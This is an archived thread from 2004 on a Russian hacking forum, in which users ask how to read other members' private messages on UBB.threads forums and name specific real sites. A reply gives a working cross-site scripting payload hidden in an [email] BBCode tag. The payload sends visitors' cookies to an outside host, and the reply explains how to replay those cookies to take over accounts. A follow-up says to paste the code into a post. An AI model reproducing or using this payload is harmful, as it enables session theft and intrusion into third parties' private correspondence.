Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Как прочесть приваты на ubb.threads™ 6.2/6.3 (https://forum.antichat.xyz/showthread.php?t=2299)

HELLer 18.07.2004 15:03

Hi ALL!
Люди подскажите, как можно посмотреть приваты юзеров на форумах типа UBB.threads™ 6.2 или 6.3? http://forum.antichat.ru/iB_html/non...s/confused.gif
Для примера приведу http://forum.isurgut.ru/ubbthreads.php?Cat= или http://www.autoua.net/auto_f/ubbthreads.php
заранее спасибки http://forum.antichat.ru/iB_html/non...icons/wink.gif
my rspkt 2 u.

Algol 18.07.2004 20:20

для http://forum.isurgut.ru :
Есть уязвимость в теге [email]
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">[email]"`/=`ddd@dd.dd[/email] ` style=`background:url("javascript:i=new Image(); i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;")` [/QUOTE]<span id='postcolor'>
Получаем куки, заменяем их у себя в браузере (например програмкой CookieEditor, качать здесь http://antichat.ru/progs.shtml ), получаем доступ к приватным ящикам.

Eldar 24.07.2004 05:19

Можно, если вам не тяжело поподробней обьяснить как вставить этот код???

Algol 24.07.2004 10:07

Вот как написано, так и вставлять))
В тело сообщения...


Время: 18:43